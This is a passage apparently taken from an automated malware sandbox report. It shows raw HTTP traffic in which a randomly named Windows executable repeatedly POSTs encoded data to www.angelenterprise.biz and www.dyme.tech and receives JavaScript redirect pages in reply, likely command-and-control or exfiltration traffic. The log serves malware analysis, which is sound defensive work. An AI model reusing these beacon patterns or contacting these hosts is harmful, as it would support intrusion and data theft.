                                          Sep 7, 2024 21:44:49.014559984 CEST1236INData Raw: 38 2e 36 36 36 33 31 20 31 2e 32 34 39 39 32 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32
                                          Data Ascii: 8.66631 1.249922,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000
                                          Sep 7, 2024 21:44:49.014571905 CEST1236INData Raw: 31 2c 38 2e 30 32 34 30 36 20 30 2e 32 39 36 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73
                                          Data Ascii: 1,8.02406 0.29651,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533"
                                          Sep 7, 2024 21:44:49.015485048 CEST1236INData Raw: 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20
                                          Data Ascii: -width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43
                                          Sep 7, 2024 21:44:49.015496969 CEST108INData Raw: 34 36 37 32 20 2d 31 31 2e 39 31 32 38 30 38 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30
                                          Data Ascii: 4672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,
                                          Sep 7, 2024 21:44:49.015506983 CEST1236INData Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a
                                          Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                                          Sep 7, 2024 21:44:49.015517950 CEST1236INData Raw: 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66
                                          Data Ascii: 289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"
                                          Sep 7, 2024 21:44:49.019195080 CEST1236INData Raw: 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74
                                          Data Ascii: oke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          17192.168.2.4562463.33.130.190804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:44:54.592462063 CEST788OUTPOST /efkd/ HTTP/1.1
                                          Host: www.angelenterprise.biz
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 204
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.angelenterprise.biz
                                          Referer: http://www.angelenterprise.biz/efkd/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Raw: 64 78 57 6c 6a 54 36 3d 46 73 33 2b 6d 75 6c 75 63 5a 43 67 79 45 4d 73 7a 32 59 73 49 50 57 2f 36 38 77 33 45 70 6e 79 2f 58 5a 59 6d 4e 4f 64 50 52 42 62 45 56 44 48 32 6a 59 6f 70 45 37 4f 42 46 71 69 75 79 57 69 41 39 4f 6e 44 44 4c 33 75 45 74 42 56 58 7a 6d 33 4e 6d 65 6c 52 49 61 4a 44 6d 64 51 78 4c 33 43 79 74 51 4a 41 6f 71 31 6e 54 4d 70 4c 59 46 6e 72 67 49 59 63 43 2f 46 43 39 33 56 4e 66 53 5a 53 62 50 77 5a 36 79 44 48 6c 59 75 72 6b 6a 34 30 78 59 4e 38 5a 4a 78 6a 72 35 44 37 53 67 32 52 79 43 4b 39 74 7a 77 73 67 35 49 30 47 38 39 73 79 6a 6a 4f 77 64 37 4b 48 39 46 33 52 71 4f 51 3d 3d
                                          Data Ascii: dxWljT6=Fs3+mulucZCgyEMsz2YsIPW/68w3Epny/XZYmNOdPRBbEVDH2jYopE7OBFqiuyWiA9OnDDL3uEtBVXzm3NmelRIaJDmdQxL3CytQJAoq1nTMpLYFnrgIYcC/FC93VNfSZSbPwZ6yDHlYurkj40xYN8ZJxjr5D7Sg2RyCK9tzwsg5I0G89syjjOwd7KH9F3RqOQ==


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          18192.168.2.4562473.33.130.190804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:44:57.134924889 CEST808OUTPOST /efkd/ HTTP/1.1
                                          Host: www.angelenterprise.biz
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 224
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.angelenterprise.biz
                                          Referer: http://www.angelenterprise.biz/efkd/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Raw: 64 78 57 6c 6a 54 36 3d 46 73 33 2b 6d 75 6c 75 63 5a 43 67 78 67 49 73 78 52 45 73 66 66 57 38 31 63 77 33 4f 4a 6e 32 2f 58 56 59 6d 49 2b 72 50 43 6c 62 45 31 7a 48 6b 53 59 6f 6b 6b 37 4f 59 31 71 64 67 53 57 54 41 39 4b 46 44 48 4c 33 75 41 39 42 56 56 72 6d 77 2b 4f 5a 6b 42 49 55 52 7a 6d 66 55 78 4c 33 43 79 74 51 4a 42 59 4d 31 6e 37 4d 70 61 6f 46 67 2f 30 48 52 38 43 2b 43 43 39 33 52 4e 65 62 5a 53 62 58 77 62 4f 59 44 45 4e 59 75 72 55 6a 34 6c 78 62 48 38 5a 50 2b 44 72 73 51 72 58 75 7a 7a 32 4e 4b 64 45 55 32 6f 73 6f 4a 79 58 6d 73 64 54 30 78 4f 55 75 6d 4e 4f 4a 49 30 73 6a 56 61 6f 64 35 74 6e 6d 6a 48 37 59 31 49 30 66 4c 70 76 54 64 4a 4d 3d
                                          Data Ascii: dxWljT6=Fs3+mulucZCgxgIsxREsffW81cw3OJn2/XVYmI+rPClbE1zHkSYokk7OY1qdgSWTA9KFDHL3uA9BVVrmw+OZkBIURzmfUxL3CytQJBYM1n7MpaoFg/0HR8C+CC93RNebZSbXwbOYDENYurUj4lxbH8ZP+DrsQrXuzz2NKdEU2osoJyXmsdT0xOUumNOJI0sjVaod5tnmjH7Y1I0fLpvTdJM=


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          19192.168.2.4562483.33.130.190804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:44:59.685391903 CEST10890OUTPOST /efkd/ HTTP/1.1
                                          Host: www.angelenterprise.biz
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 10304
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.angelenterprise.biz
                                          Referer: http://www.angelenterprise.biz/efkd/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Raw: 64 78 57 6c 6a 54 36 3d 46 73 33 2b 6d 75 6c 75 63 5a 43 67 78 67 49 73 78 52 45 73 66 66 57 38 31 63 77 33 4f 4a 6e 32 2f 58 56 59 6d 49 2b 72 50 43 74 62 45 6d 37 48 31 42 77 6f 72 45 37 4f 51 56 71 6d 67 53 57 4f 41 35 75 42 44 48 48 4a 75 43 31 42 55 32 6a 6d 78 50 4f 5a 74 42 49 55 4e 44 6d 65 51 78 4b 6a 43 32 41 59 4a 41 6b 4d 31 6e 37 4d 70 5a 77 46 32 37 67 48 64 63 43 2f 46 43 39 37 56 4e 65 7a 5a 53 44 74 77 62 61 69 43 31 74 59 75 4c 45 6a 72 6e 5a 62 4c 38 5a 4e 2f 44 71 70 51 71 72 6c 7a 7a 72 38 4b 64 42 7a 32 76 6b 6f 4c 47 61 67 30 50 54 6a 6e 39 30 4b 6b 75 75 4e 48 31 4e 68 61 5a 6b 61 32 63 72 4b 6a 55 6e 59 31 72 63 62 5a 35 58 35 4a 4d 38 45 5a 63 35 42 46 64 46 48 33 74 47 61 4e 6b 4a 64 38 56 6d 52 77 56 75 51 49 48 56 4d 34 51 74 73 72 37 4f 79 45 78 57 69 65 38 51 6e 44 51 48 78 7a 33 30 34 67 64 32 67 77 5a 43 46 4d 4b 2f 4b 76 49 6f 45 44 37 43 42 63 2f 6b 75 71 2b 74 71 6f 50 46 38 45 2b 41 4e 50 44 67 50 6d 59 77 72 43 41 45 6d 78 71 48 47 6e 76 74 39 75 58 69 4f 4d 70 [TRUNCATED]
                                          Data Ascii: dxWljT6=Fs3+mulucZCgxgIsxREsffW81cw3OJn2/XVYmI+rPCtbEm7H1BworE7OQVqmgSWOA5uBDHHJuC1BU2jmxPOZtBIUNDmeQxKjC2AYJAkM1n7MpZwF27gHdcC/FC97VNezZSDtwbaiC1tYuLEjrnZbL8ZN/DqpQqrlzzr8KdBz2vkoLGag0PTjn90KkuuNH1NhaZka2crKjUnY1rcbZ5X5JM8EZc5BFdFH3tGaNkJd8VmRwVuQIHVM4Qtsr7OyExWie8QnDQHxz304gd2gwZCFMK/KvIoED7CBc/kuq+tqoPF8E+ANPDgPmYwrCAEmxqHGnvt9uXiOMphqky6F17GQh/LG7Zd3zY7ySgxzTUuNdIjzDJnsP/D33J3lwIf1edVBACrzzJGSxXi8jYnsw9Jq/66c+ZLn+4S+S2WFNeNIbE90AbHdPukqagtXZ8FCp276tIQAPf0sapbc3A4C97emFbqmMvjq0f/S1ShkB2FUdlU/rzswEzGmy7p464w9UrjvmaZFqga6KJrwE1qI/75T2NZ1zwPQ8d06yfqd8yy02FFLxlaR9qY8M5HD7NokZQatZAL0jDNAwTfbWomsvQ65xtTInKMjnRq1Se66kp1MXZOh8bOBt+6DwYRckDCZ2AvbqvlaEwSrZgZG+Ztqbz2zVaDgeLStjNwIJLhhu0OptPbA6gQinNeUgHZa+ReHyCap5NGrsS4rfPqqT89LVaz7widJqYUM9m0Gq1CHOwClYvGssjofxyJ0WlcqYD7HR7U4msw8wEfdXDeDo3105AuvTwghj0uNJbspV5aaOqal68g/pqmSGA04QVFP2B0BX88xvlAgf6nrfC4too+o3YepltUfDvQPHfaOj5hE/eni6q3DjigUtz3bt7nxIg7bHyG6UuUMmAGobTuVzXO1uQ040VMXopQ/7AfzHVh7YpyuuTNblLue5RvfntU0pL2+Zsz89GhbXb3hew+ID3S8nr4E1hZfDlkFijT6RSgwcfX+zN3F [TRUNCATED]


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          20192.168.2.4562493.33.130.190804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:45:02.232033014 CEST508OUTGET /efkd/?GtLD=xFGdQ6FH&dxWljT6=IufelbUCTKOeuwMN5EUqf6TB6ckeX6bIx1td5c35eyVbCG3IzyIKjn3SW0agpxesK9W5YHm3vT0AFFjY1MT7kmsSBjfmSD/gL3FGHQgm/hfO+eZf+Z8hf6A= HTTP/1.1
                                          Host: www.angelenterprise.biz
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.5
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Sep 7, 2024 21:45:02.701323986 CEST397INHTTP/1.1 200 OK
                                          Server: openresty
                                          Date: Sat, 07 Sep 2024 19:45:02 GMT
                                          Content-Type: text/html
                                          Content-Length: 257
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 74 4c 44 3d 78 46 47 64 51 36 46 48 26 64 78 57 6c 6a 54 36 3d 49 75 66 65 6c 62 55 43 54 4b 4f 65 75 77 4d 4e 35 45 55 71 66 36 54 42 36 63 6b 65 58 36 62 49 78 31 74 64 35 63 33 35 65 79 56 62 43 47 33 49 7a 79 49 4b 6a 6e 33 53 57 30 61 67 70 78 65 73 4b 39 57 35 59 48 6d 33 76 54 30 41 46 46 6a 59 31 4d 54 37 6b 6d 73 53 42 6a 66 6d 53 44 2f 67 4c 33 46 47 48 51 67 6d 2f 68 66 4f 2b 65 5a 66 2b 5a 38 68 66 36 41 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GtLD=xFGdQ6FH&dxWljT6=IufelbUCTKOeuwMN5EUqf6TB6ckeX6bIx1td5c35eyVbCG3IzyIKjn3SW0agpxesK9W5YHm3vT0AFFjY1MT7kmsSBjfmSD/gL3FGHQgm/hfO+eZf+Z8hf6A="}</script></head></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          21192.168.2.45625013.248.169.48804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:45:07.755774021 CEST758OUTPOST /pjne/ HTTP/1.1
                                          Host: www.dyme.tech
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 204
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.dyme.tech
                                          Referer: http://www.dyme.tech/pjne/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Raw: 64 78 57 6c 6a 54 36 3d 6f 6a 42 57 44 2f 34 44 38 48 54 59 5a 4a 39 4e 42 6a 53 36 6d 62 7a 69 48 7a 57 4d 2b 56 6b 6e 35 6c 36 41 39 78 78 74 64 6b 56 58 6b 71 4b 68 30 30 6b 69 4c 44 58 32 44 65 47 50 67 4f 4a 33 65 41 71 4b 42 6d 59 77 4b 35 68 66 59 59 78 4e 71 57 52 6c 70 43 41 64 49 44 4c 64 41 6e 30 41 66 71 75 63 43 62 2b 76 6b 76 38 71 47 73 31 52 67 6f 4d 37 67 41 4e 51 4a 30 31 59 69 33 49 6e 71 44 54 76 6f 74 53 51 39 6a 62 69 47 54 41 35 6f 41 50 57 53 68 79 77 39 79 7a 77 46 72 61 32 36 69 6b 61 41 41 67 37 7a 4b 71 61 7a 75 6c 59 4f 55 2f 4d 51 2b 59 38 43 37 71 56 58 4d 66 31 4f 67 3d 3d
                                          Data Ascii: dxWljT6=ojBWD/4D8HTYZJ9NBjS6mbziHzWM+Vkn5l6A9xxtdkVXkqKh00kiLDX2DeGPgOJ3eAqKBmYwK5hfYYxNqWRlpCAdIDLdAn0AfqucCb+vkv8qGs1RgoM7gANQJ01Yi3InqDTvotSQ9jbiGTA5oAPWShyw9yzwFra26ikaAAg7zKqazulYOU/MQ+Y8C7qVXMf1Og==


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          22192.168.2.45625113.248.169.48804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:45:10.784368992 CEST778OUTPOST /pjne/ HTTP/1.1
                                          Host: www.dyme.tech
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 224
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.dyme.tech
                                          Referer: http://www.dyme.tech/pjne/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Raw: 64 78 57 6c 6a 54 36 3d 6f 6a 42 57 44 2f 34 44 38 48 54 59 5a 71 31 4e 44 41 36 36 7a 72 7a 6a 4c 54 57 4d 30 31 6b 6a 35 6c 2b 41 39 7a 64 39 65 52 4e 58 6c 4f 4f 68 31 78 59 69 4b 44 58 32 62 4f 47 4b 2b 2b 4a 38 65 41 76 35 42 69 51 77 4b 35 31 66 59 61 70 4e 71 68 6c 69 6f 53 41 66 46 6a 4c 66 50 48 30 41 66 71 75 63 43 62 71 4a 6b 76 6b 71 47 38 6c 52 67 4a 4d 36 2b 77 4e 66 4b 30 31 59 30 48 4a 75 71 44 54 5a 6f 75 58 4c 39 67 6a 69 47 54 77 35 70 56 6a 52 62 68 79 79 77 53 79 78 46 35 72 6c 7a 69 35 36 49 51 49 46 74 62 33 37 79 6f 30 43 66 6c 65 62 43 2b 38 50 66 38 6a 68 61 50 69 38 56 6a 6d 74 67 64 6d 32 6b 74 74 77 71 30 72 6a 6e 69 41 66 36 2b 49 3d
                                          Data Ascii: dxWljT6=ojBWD/4D8HTYZq1NDA66zrzjLTWM01kj5l+A9zd9eRNXlOOh1xYiKDX2bOGK++J8eAv5BiQwK51fYapNqhlioSAfFjLfPH0AfqucCbqJkvkqG8lRgJM6+wNfK01Y0HJuqDTZouXL9gjiGTw5pVjRbhyywSyxF5rlzi56IQIFtb37yo0CflebC+8Pf8jhaPi8Vjmtgdm2kttwq0rjniAf6+I=


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          23192.168.2.45625213.248.169.48804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:45:13.815429926 CEST10860OUTPOST /pjne/ HTTP/1.1
                                          Host: www.dyme.tech
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 10304
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.dyme.tech
                                          Referer: http://www.dyme.tech/pjne/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Raw: 64 78 57 6c 6a 54 36 3d 6f 6a 42 57 44 2f 34 44 38 48 54 59 5a 71 31 4e 44 41 36 36 7a 72 7a 6a 4c 54 57 4d 30 31 6b 6a 35 6c 2b 41 39 7a 64 39 65 53 74 58 6b 37 61 68 31 57 4d 69 4a 44 58 32 54 75 47 4c 2b 2b 4a 68 65 41 58 6d 42 69 63 4b 4b 39 46 66 59 2f 31 4e 73 55 4a 69 78 43 41 66 61 7a 4c 43 41 6e 31 4b 66 71 2b 59 43 62 36 4a 6b 76 6b 71 47 2b 74 52 33 49 4d 36 38 77 4e 51 4a 30 31 55 69 33 49 48 71 44 36 73 6f 76 6a 62 2b 52 44 69 47 33 55 35 76 6e 37 52 44 78 79 30 38 79 7a 69 46 35 6d 39 7a 69 56 49 49 51 4d 76 74 62 54 37 7a 2b 35 4b 49 6d 53 59 51 74 41 4c 64 4f 6a 62 44 63 79 4d 54 79 53 32 6d 4a 43 50 7a 75 31 36 6e 6d 57 4d 31 78 63 4c 6f 49 4c 73 62 61 2b 4d 52 4c 54 68 61 4a 4e 6c 38 4d 41 53 77 47 69 6e 68 4c 64 70 38 34 4d 74 32 65 48 73 52 57 7a 6a 6e 52 56 47 6b 6b 67 37 53 55 45 51 7a 4e 7a 4f 2f 6c 75 75 64 6a 74 65 39 63 4c 61 6b 49 32 7a 32 4b 69 6d 65 5a 65 2f 6c 75 4b 4b 71 48 6b 5a 54 79 47 78 38 4d 45 69 6b 68 52 70 72 35 76 37 52 6a 31 6e 78 41 32 76 6e 32 73 4e 37 45 [TRUNCATED]
                                          Data Ascii: dxWljT6=ojBWD/4D8HTYZq1NDA66zrzjLTWM01kj5l+A9zd9eStXk7ah1WMiJDX2TuGL++JheAXmBicKK9FfY/1NsUJixCAfazLCAn1Kfq+YCb6JkvkqG+tR3IM68wNQJ01Ui3IHqD6sovjb+RDiG3U5vn7RDxy08yziF5m9ziVIIQMvtbT7z+5KImSYQtALdOjbDcyMTyS2mJCPzu16nmWM1xcLoILsba+MRLThaJNl8MASwGinhLdp84Mt2eHsRWzjnRVGkkg7SUEQzNzO/luudjte9cLakI2z2KimeZe/luKKqHkZTyGx8MEikhRpr5v7Rj1nxA2vn2sN7EUvrSuW+M5Hc/H/3wlP4QDq91tBNuS+g39j5/en6RVUyZ1pqTN7zDcYLUw36sEkeOlxNSw/Dv7kITwRqrR1TtoDGEQ8hm6R62NsOqIWOW1yDEvkJZCMh8DCOfBu7gWQ6xsByfXpa16YLYXJYHAgLVi2MQtSntOO+c0QLLb9oYlfq8tyVV/D2UrmMBx7dq6i1/mINeBGSW6gliJ/momrRZ8rg41OX+gTrD8Q1L3D5INnQMiUeLgqd17C/ua4PJzunuk8A3AQyZPPB2ftMtwWkPdclS30exRvpsSo71ZBRqRxfSKw0gAF6c3DQQNdYrloyjXlvdXDYprw897S1Z6SmatTvF/TayUUGUZZSLUKTk33yVW2E4yX2eQ0N2vie6q0QitQ1KuVuwV/ctpOO5EJt+cga1LmCqKM9QI1D8ox5tRUACZcIijG1OGNFPUQN0IRGCcnhHv7jx/F0ECcSYoyr5v2s6k9xXzhcNf6106sJkH1mjqCNDFhnUQkHi31aNoJLwuRNMza48/q4Ng4onn3CswksaXjJTmVmfJmDjNW7lBkBwYOy/DCoFOoTpbMXa26z1ABvH9uzrZ4gvrZZFnIyBw+8W0Qej5FNEuLp+MKLv5P2sxGxbk/Dsf5yXKJftF2wdrpUr1mlLfCl1Q+xuNYr6SVa8JNW/C3mHuX [TRUNCATED]


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          24192.168.2.45625313.248.169.48804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:45:16.352130890 CEST498OUTGET /pjne/?dxWljT6=lhp2AL1o8WnbXPZMRwuNwZPsCjGMimAytiXH6n0uWTdA0JaaykggGBvZUdK/udhaMgulQSxiSbl+DIpIo1gQvhEzJQCgKGJIbKmEGc+7pbgyQptTpIVqrWg=&GtLD=xFGdQ6FH HTTP/1.1
                                          Host: www.dyme.tech
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.5
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Sep 7, 2024 21:45:16.809504986 CEST397INHTTP/1.1 200 OK
                                          Server: openresty
                                          Date: Sat, 07 Sep 2024 19:45:16 GMT
                                          Content-Type: text/html
                                          Content-Length: 257
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 64 78 57 6c 6a 54 36 3d 6c 68 70 32 41 4c 31 6f 38 57 6e 62 58 50 5a 4d 52 77 75 4e 77 5a 50 73 43 6a 47 4d 69 6d 41 79 74 69 58 48 36 6e 30 75 57 54 64 41 30 4a 61 61 79 6b 67 67 47 42 76 5a 55 64 4b 2f 75 64 68 61 4d 67 75 6c 51 53 78 69 53 62 6c 2b 44 49 70 49 6f 31 67 51 76 68 45 7a 4a 51 43 67 4b 47 4a 49 62 4b 6d 45 47 63 2b 37 70 62 67 79 51 70 74 54 70 49 56 71 72 57 67 3d 26 47 74 4c 44 3d 78 46 47 64 51 36 46 48 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?dxWljT6=lhp2AL1o8WnbXPZMRwuNwZPsCjGMimAytiXH6n0uWTdA0JaaykggGBvZUdK/udhaMgulQSxiSbl+DIpIo1gQvhEzJQCgKGJIbKmEGc+7pbgyQptTpIVqrWg=&GtLD=xFGdQ6FH"}</script></head></html>

